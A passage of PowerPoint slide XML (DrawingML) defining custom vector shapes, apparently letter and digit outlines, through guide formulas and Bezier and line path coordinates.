                        <a:pt x="3" y="2"/>
                        <a:pt x="3" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="3"/>
                        <a:pt x="2" y="4"/>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280"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9642475" y="4492626"/>
                  <a:ext cx="25400" cy="39688"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 2 w 11"/>
                    <a:gd name="T1" fmla="*/ 4 h 17"/>
                    <a:gd name="T2" fmla="*/ 1 w 11"/>
                    <a:gd name="T3" fmla="*/ 4 h 17"/>
                    <a:gd name="T4" fmla="*/ 2 w 11"/>
                    <a:gd name="T5" fmla="*/ 1 h 17"/>
                    <a:gd name="T6" fmla="*/ 5 w 11"/>
                    <a:gd name="T7" fmla="*/ 0 h 17"/>
                    <a:gd name="T8" fmla="*/ 8 w 11"/>
                    <a:gd name="T9" fmla="*/ 0 h 17"/>
                    <a:gd name="T10" fmla="*/ 9 w 11"/>
                    <a:gd name="T11" fmla="*/ 2 h 17"/>
                    <a:gd name="T12" fmla="*/ 10 w 11"/>
                    <a:gd name="T13" fmla="*/ 4 h 17"/>
                    <a:gd name="T14" fmla="*/ 8 w 11"/>
                    <a:gd name="T15" fmla="*/ 7 h 17"/>
                    <a:gd name="T16" fmla="*/ 10 w 11"/>
                    <a:gd name="T17" fmla="*/ 9 h 17"/>
                    <a:gd name="T18" fmla="*/ 11 w 11"/>
                    <a:gd name="T19" fmla="*/ 12 h 17"/>
                    <a:gd name="T20" fmla="*/ 10 w 11"/>
                    <a:gd name="T21" fmla="*/ 14 h 17"/>
                    <a:gd name="T22" fmla="*/ 8 w 11"/>
                    <a:gd name="T23" fmla="*/ 16 h 17"/>
                    <a:gd name="T24" fmla="*/ 5 w 11"/>
                    <a:gd name="T25" fmla="*/ 17 h 17"/>
                    <a:gd name="T26" fmla="*/ 2 w 11"/>
                    <a:gd name="T27" fmla="*/ 16 h 17"/>
                    <a:gd name="T28" fmla="*/ 0 w 11"/>
                    <a:gd name="T29" fmla="*/ 12 h 17"/>
                    <a:gd name="T30" fmla="*/ 2 w 11"/>
                    <a:gd name="T31" fmla="*/ 12 h 17"/>
                    <a:gd name="T32" fmla="*/ 3 w 11"/>
                    <a:gd name="T33" fmla="*/ 14 h 17"/>
                    <a:gd name="T34" fmla="*/ 5 w 11"/>
                    <a:gd name="T35" fmla="*/ 15 h 17"/>
                    <a:gd name="T36" fmla="*/ 8 w 11"/>
                    <a:gd name="T37" fmla="*/ 14 h 17"/>
                    <a:gd name="T38" fmla="*/ 9 w 11"/>
                    <a:gd name="T39" fmla="*/ 12 h 17"/>
                    <a:gd name="T40" fmla="*/ 9 w 11"/>
                    <a:gd name="T41" fmla="*/ 10 h 17"/>
                    <a:gd name="T42" fmla="*/ 7 w 11"/>
                    <a:gd name="T43" fmla="*/ 9 h 17"/>
                    <a:gd name="T44" fmla="*/ 4 w 11"/>
                    <a:gd name="T45" fmla="*/ 8 h 17"/>
                    <a:gd name="T46" fmla="*/ 4 w 11"/>
                    <a:gd name="T47" fmla="*/ 7 h 17"/>
                    <a:gd name="T48" fmla="*/ 6 w 11"/>
                    <a:gd name="T49" fmla="*/ 6 h 17"/>
                    <a:gd name="T50" fmla="*/ 8 w 11"/>
                    <a:gd name="T51" fmla="*/ 5 h 17"/>
                    <a:gd name="T52" fmla="*/ 8 w 11"/>
                    <a:gd name="T53" fmla="*/ 4 h 17"/>
                    <a:gd name="T54" fmla="*/ 7 w 11"/>
                    <a:gd name="T55" fmla="*/ 2 h 17"/>
                    <a:gd name="T56" fmla="*/ 5 w 11"/>
                    <a:gd name="T57" fmla="*/ 1 h 17"/>
                    <a:gd name="T58" fmla="*/ 3 w 11"/>
                    <a:gd name="T59" fmla="*/ 2 h 17"/>
                    <a:gd name="T60" fmla="*/ 2 w 11"/>
                    <a:gd name="T61"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 h="17">
                      <a:moveTo>
                        <a:pt x="2" y="4"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="4"/>
                        <a:pt x="1" y="4"/>
                        <a:pt x="1" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="3"/>
                        <a:pt x="1" y="2"/>
                        <a:pt x="2" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="0"/>
                        <a:pt x="4" y="0"/>
                        <a:pt x="5" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="0"/>
                        <a:pt x="7" y="0"/>
                        <a:pt x="8" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="1"/>
                        <a:pt x="9" y="1"/>
                        <a:pt x="9" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="3"/>
                        <a:pt x="10" y="3"/>
                        <a:pt x="10" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="5"/>
                        <a:pt x="9" y="6"/>
                        <a:pt x="8" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="8"/>
                        <a:pt x="9" y="8"/>
                        <a:pt x="10" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="10"/>
                        <a:pt x="11" y="10"/>
                        <a:pt x="11" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="12"/>
                        <a:pt x="10" y="13"/>
                        <a:pt x="10" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="15"/>
                        <a:pt x="9" y="16"/>
                        <a:pt x="8" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="16"/>
                        <a:pt x="6" y="17"/>
                        <a:pt x="5" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="17"/>
                        <a:pt x="3" y="16"/>
                        <a:pt x="2" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="15"/>
                        <a:pt x="0" y="14"/>
                        <a:pt x="0" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="12"/>
                        <a:pt x="2" y="12"/>
                        <a:pt x="2" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="13"/>
                        <a:pt x="2" y="14"/>
                        <a:pt x="3" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="15"/>
                        <a:pt x="4" y="15"/>
                        <a:pt x="5" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="15"/>
                        <a:pt x="7" y="15"/>
                        <a:pt x="8" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="13"/>
                        <a:pt x="9" y="13"/>
                        <a:pt x="9" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="11"/>
                        <a:pt x="9" y="10"/>
                        <a:pt x="9" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="9"/>
                        <a:pt x="8" y="9"/>
                        <a:pt x="7" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="8"/>
                        <a:pt x="6" y="8"/>
                        <a:pt x="4" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="7"/>
                        <a:pt x="4" y="7"/>
                        <a:pt x="4" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="7"/>
                        <a:pt x="6" y="7"/>
                        <a:pt x="6" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="6"/>
                        <a:pt x="8" y="6"/>
                        <a:pt x="8" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="5"/>
                        <a:pt x="8" y="4"/>
                        <a:pt x="8" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="3"/>
                        <a:pt x="8" y="3"/>
                        <a:pt x="7" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="2"/>
                        <a:pt x="6" y="1"/>
                        <a:pt x="5" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="1"/>
                        <a:pt x="4" y="2"/>
                        <a:pt x="3" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="2"/>
                        <a:pt x="3"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281"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9671050" y="4492626"/>
                  <a:ext cx="20638" cy="41275"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 13 w 13"/>
                    <a:gd name="T1" fmla="*/ 0 h 26"/>
                    <a:gd name="T2" fmla="*/ 3 w 13"/>
                    <a:gd name="T3" fmla="*/ 26 h 26"/>
                    <a:gd name="T4" fmla="*/ 0 w 13"/>
                    <a:gd name="T5" fmla="*/ 26 h 26"/>
                    <a:gd name="T6" fmla="*/ 10 w 13"/>
                    <a:gd name="T7" fmla="*/ 0 h 26"/>
                    <a:gd name="T8" fmla="*/ 13 w 13"/>
                    <a:gd name="T9" fmla="*/ 0 h 26"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="13" h="26">
                      <a:moveTo>
                        <a:pt x="13" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="3" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="10" y="0"/>
                      </a:ln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282"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9701213" y="4492626"/>
                  <a:ext cx="7938" cy="36513"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 5"/>
                    <a:gd name="T1" fmla="*/ 0 h 23"/>
                    <a:gd name="T2" fmla="*/ 5 w 5"/>
                    <a:gd name="T3" fmla="*/ 0 h 23"/>
                    <a:gd name="T4" fmla="*/ 5 w 5"/>
                    <a:gd name="T5" fmla="*/ 23 h 23"/>
                    <a:gd name="T6" fmla="*/ 3 w 5"/>
                    <a:gd name="T7" fmla="*/ 23 h 23"/>
                    <a:gd name="T8" fmla="*/ 3 w 5"/>
                    <a:gd name="T9" fmla="*/ 3 h 23"/>
                    <a:gd name="T10" fmla="*/ 0 w 5"/>
                    <a:gd name="T11" fmla="*/ 3 h 23"/>
                    <a:gd name="T12" fmla="*/ 0 w 5"/>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5" h="23">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="5" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="3"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0"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283"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9305925" y="4427538"/>
                  <a:ext cx="15875" cy="36513"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 10"/>
                    <a:gd name="T1" fmla="*/ 0 h 23"/>
                    <a:gd name="T2" fmla="*/ 1 w 10"/>
                    <a:gd name="T3" fmla="*/ 0 h 23"/>
                    <a:gd name="T4" fmla="*/ 1 w 10"/>
                    <a:gd name="T5" fmla="*/ 21 h 23"/>
                    <a:gd name="T6" fmla="*/ 10 w 10"/>
                    <a:gd name="T7" fmla="*/ 21 h 23"/>
                    <a:gd name="T8" fmla="*/ 10 w 10"/>
                    <a:gd name="T9" fmla="*/ 23 h 23"/>
                    <a:gd name="T10" fmla="*/ 0 w 10"/>
                    <a:gd name="T11" fmla="*/ 23 h 23"/>
                    <a:gd name="T12" fmla="*/ 0 w 1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0" h="23">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="1" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="10" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="10" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="2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284"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9324975" y="4427538"/>
                  <a:ext cx="36513" cy="36513"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 11 w 23"/>
                    <a:gd name="T1" fmla="*/ 0 h 23"/>
                    <a:gd name="T2" fmla="*/ 23 w 23"/>
                    <a:gd name="T3" fmla="*/ 23 h 23"/>
                    <a:gd name="T4" fmla="*/ 20 w 23"/>
                    <a:gd name="T5" fmla="*/ 23 h 23"/>
                    <a:gd name="T6" fmla="*/ 17 w 23"/>
                    <a:gd name="T7" fmla="*/ 16 h 23"/>
                    <a:gd name="T8" fmla="*/ 7 w 23"/>
                    <a:gd name="T9" fmla="*/ 16 h 23"/>
                    <a:gd name="T10" fmla="*/ 2 w 23"/>
                    <a:gd name="T11" fmla="*/ 23 h 23"/>
                    <a:gd name="T12" fmla="*/ 0 w 23"/>
                    <a:gd name="T13" fmla="*/ 23 h 23"/>
                    <a:gd name="T14" fmla="*/ 11 w 23"/>
                    <a:gd name="T15" fmla="*/ 0 h 23"/>
                    <a:gd name="T16" fmla="*/ 11 w 23"/>
                    <a:gd name="T17" fmla="*/ 0 h 23"/>
                    <a:gd name="T18" fmla="*/ 11 w 23"/>
                    <a:gd name="T19" fmla="*/ 4 h 23"/>
                    <a:gd name="T20" fmla="*/ 7 w 23"/>
                    <a:gd name="T21" fmla="*/ 13 h 23"/>
                    <a:gd name="T22" fmla="*/ 16 w 23"/>
                    <a:gd name="T23" fmla="*/ 13 h 23"/>
                    <a:gd name="T24" fmla="*/ 11 w 23"/>
                    <a:gd name="T25"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11" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="23" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="20" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17" y="16"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="7" y="16"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11" y="0"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="11" y="4"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="7" y="13"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="16" y="13"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1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285"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9363075" y="4427538"/>
                  <a:ext cx="20638" cy="36513"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 9"/>
                    <a:gd name="T1" fmla="*/ 13 h 16"/>
                    <a:gd name="T2" fmla="*/ 1 w 9"/>
                    <a:gd name="T3" fmla="*/ 12 h 16"/>
                    <a:gd name="T4" fmla="*/ 4 w 9"/>
                    <a:gd name="T5" fmla="*/ 15 h 16"/>
                    <a:gd name="T6" fmla="*/ 6 w 9"/>
                    <a:gd name="T7" fmla="*/ 14 h 16"/>
                    <a:gd name="T8" fmla="*/ 7 w 9"/>
                    <a:gd name="T9" fmla="*/ 13 h 16"/>
                    <a:gd name="T10" fmla="*/ 7 w 9"/>
                    <a:gd name="T11" fmla="*/ 12 h 16"/>
                    <a:gd name="T12" fmla="*/ 7 w 9"/>
                    <a:gd name="T13" fmla="*/ 11 h 16"/>
                    <a:gd name="T14" fmla="*/ 4 w 9"/>
                    <a:gd name="T15" fmla="*/ 8 h 16"/>
                    <a:gd name="T16" fmla="*/ 2 w 9"/>
                    <a:gd name="T17" fmla="*/ 6 h 16"/>
                    <a:gd name="T18" fmla="*/ 1 w 9"/>
                    <a:gd name="T19" fmla="*/ 3 h 16"/>
                    <a:gd name="T20" fmla="*/ 1 w 9"/>
                    <a:gd name="T21" fmla="*/ 1 h 16"/>
                    <a:gd name="T22" fmla="*/ 3 w 9"/>
                    <a:gd name="T23" fmla="*/ 0 h 16"/>
                    <a:gd name="T24" fmla="*/ 5 w 9"/>
                    <a:gd name="T25" fmla="*/ 0 h 16"/>
                    <a:gd name="T26" fmla="*/ 7 w 9"/>
                    <a:gd name="T27" fmla="*/ 0 h 16"/>
                    <a:gd name="T28" fmla="*/ 9 w 9"/>
                    <a:gd name="T29" fmla="*/ 2 h 16"/>
                    <a:gd name="T30" fmla="*/ 7 w 9"/>
                    <a:gd name="T31" fmla="*/ 3 h 16"/>
                    <a:gd name="T32" fmla="*/ 6 w 9"/>
                    <a:gd name="T33" fmla="*/ 2 h 16"/>
                    <a:gd name="T34" fmla="*/ 5 w 9"/>
                    <a:gd name="T35" fmla="*/ 1 h 16"/>
                    <a:gd name="T36" fmla="*/ 3 w 9"/>
                    <a:gd name="T37" fmla="*/ 2 h 16"/>
                    <a:gd name="T38" fmla="*/ 2 w 9"/>
                    <a:gd name="T39" fmla="*/ 3 h 16"/>
                    <a:gd name="T40" fmla="*/ 3 w 9"/>
                    <a:gd name="T41" fmla="*/ 4 h 16"/>
                    <a:gd name="T42" fmla="*/ 3 w 9"/>
                    <a:gd name="T43" fmla="*/ 5 h 16"/>
                    <a:gd name="T44" fmla="*/ 5 w 9"/>
                    <a:gd name="T45" fmla="*/ 7 h 16"/>
                    <a:gd name="T46" fmla="*/ 8 w 9"/>
                    <a:gd name="T47" fmla="*/ 10 h 16"/>
                    <a:gd name="T48" fmla="*/ 9 w 9"/>
                    <a:gd name="T49" fmla="*/ 12 h 16"/>
                    <a:gd name="T50" fmla="*/ 8 w 9"/>
                    <a:gd name="T51" fmla="*/ 15 h 16"/>
                    <a:gd name="T52" fmla="*/ 5 w 9"/>
                    <a:gd name="T53" fmla="*/ 16 h 16"/>
                    <a:gd name="T54" fmla="*/ 2 w 9"/>
                    <a:gd name="T55" fmla="*/ 16 h 16"/>
                    <a:gd name="T56" fmla="*/ 0 w 9"/>
                    <a:gd name="T57"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 h="16">
                      <a:moveTo>
                        <a:pt x="0" y="13"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="12"/>
                        <a:pt x="1" y="12"/>
                        <a:pt x="1" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="14"/>
                        <a:pt x="3" y="15"/>
                        <a:pt x="4" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="15"/>
                        <a:pt x="5" y="15"/>
                        <a:pt x="6" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="14"/>
                        <a:pt x="7" y="14"/>
                        <a:pt x="7" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="13"/>
                        <a:pt x="7" y="13"/>
                        <a:pt x="7" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="12"/>
                        <a:pt x="7" y="11"/>
                        <a:pt x="7" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="10"/>
                        <a:pt x="5" y="9"/>
                        <a:pt x="4" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="7"/>
                        <a:pt x="2" y="6"/>
                        <a:pt x="2" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="5"/>
                        <a:pt x="1" y="4"/>
                        <a:pt x="1" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="3"/>
                        <a:pt x="1" y="2"/>
                        <a:pt x="1" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="1"/>
                        <a:pt x="2" y="0"/>
                        <a:pt x="3" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="0"/>
                        <a:pt x="4" y="0"/>
                        <a:pt x="5" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="0"/>
                        <a:pt x="6" y="0"/>
                        <a:pt x="7" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="0"/>
                        <a:pt x="8" y="1"/>
                        <a:pt x="9" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="3"/>
                        <a:pt x="7" y="3"/>
                        <a:pt x="7" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="2"/>
                        <a:pt x="6" y="2"/>
                        <a:pt x="6" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="1"/>
                        <a:pt x="5" y="1"/>
                        <a:pt x="5" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="1"/>
                        <a:pt x="3" y="1"/>
                        <a:pt x="3" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="2"/>
                        <a:pt x="2" y="3"/>
                        <a:pt x="2" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="4"/>
                        <a:pt x="2" y="4"/>
                        <a:pt x="3" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="5"/>
                        <a:pt x="3" y="5"/>
                        <a:pt x="3" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="6"/>
                        <a:pt x="4" y="6"/>
                        <a:pt x="5" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="8"/>
                        <a:pt x="8" y="9"/>
                        <a:pt x="8" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="10"/>
                        <a:pt x="9" y="11"/>
                        <a:pt x="9" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="13"/>
                        <a:pt x="9" y="14"/>
                        <a:pt x="8" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="16"/>
                        <a:pt x="6" y="16"/>
                        <a:pt x="5" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="16"/>
                        <a:pt x="3" y="16"/>
                        <a:pt x="2" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="15"/>
                        <a:pt x="0" y="14"/>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286"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9388475" y="4427538"/>
                  <a:ext cx="20638" cy="36513"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 13"/>
                    <a:gd name="T1" fmla="*/ 3 h 23"/>
                    <a:gd name="T2" fmla="*/ 0 w 13"/>
                    <a:gd name="T3" fmla="*/ 0 h 23"/>
                    <a:gd name="T4" fmla="*/ 13 w 13"/>
                    <a:gd name="T5" fmla="*/ 0 h 23"/>
                    <a:gd name="T6" fmla="*/ 13 w 13"/>
                    <a:gd name="T7" fmla="*/ 3 h 23"/>
                    <a:gd name="T8" fmla="*/ 8 w 13"/>
                    <a:gd name="T9" fmla="*/ 3 h 23"/>
                    <a:gd name="T10" fmla="*/ 8 w 13"/>
                    <a:gd name="T11" fmla="*/ 23 h 23"/>
                    <a:gd name="T12" fmla="*/ 5 w 13"/>
                    <a:gd name="T13" fmla="*/ 23 h 23"/>
                    <a:gd name="T14" fmla="*/ 5 w 13"/>
                    <a:gd name="T15" fmla="*/ 3 h 23"/>
                    <a:gd name="T16" fmla="*/ 0 w 13"/>
                    <a:gd name="T1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3">
                      <a:moveTo>
                        <a:pt x="0" y="3"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13" y="3"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8" y="3"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5"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287"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9428163" y="4427538"/>
                  <a:ext cx="30163" cy="36513"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 19"/>
                    <a:gd name="T1" fmla="*/ 23 h 23"/>
                    <a:gd name="T2" fmla="*/ 0 w 19"/>
                    <a:gd name="T3" fmla="*/ 0 h 23"/>
                    <a:gd name="T4" fmla="*/ 0 w 19"/>
                    <a:gd name="T5" fmla="*/ 0 h 23"/>
                    <a:gd name="T6" fmla="*/ 16 w 19"/>
                    <a:gd name="T7" fmla="*/ 18 h 23"/>
                    <a:gd name="T8" fmla="*/ 16 w 19"/>
                    <a:gd name="T9" fmla="*/ 0 h 23"/>
                    <a:gd name="T10" fmla="*/ 19 w 19"/>
                    <a:gd name="T11" fmla="*/ 0 h 23"/>
                    <a:gd name="T12" fmla="*/ 19 w 19"/>
                    <a:gd name="T13" fmla="*/ 23 h 23"/>
                    <a:gd name="T14" fmla="*/ 17 w 19"/>
                    <a:gd name="T15" fmla="*/ 23 h 23"/>
                    <a:gd name="T16" fmla="*/ 3 w 19"/>
                    <a:gd name="T17" fmla="*/ 6 h 23"/>
                    <a:gd name="T18" fmla="*/ 3 w 19"/>
                    <a:gd name="T19" fmla="*/ 23 h 23"/>
                    <a:gd name="T20" fmla="*/ 0 w 19"/>
                    <a:gd name="T2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3">
                      <a:moveTo>
                        <a:pt x="0" y="23"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="16" y="18"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="16" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="19" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="19" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="6"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="23"/>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288"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9463088" y="4427538"/>
                  <a:ext cx="36513" cy="36513"/>
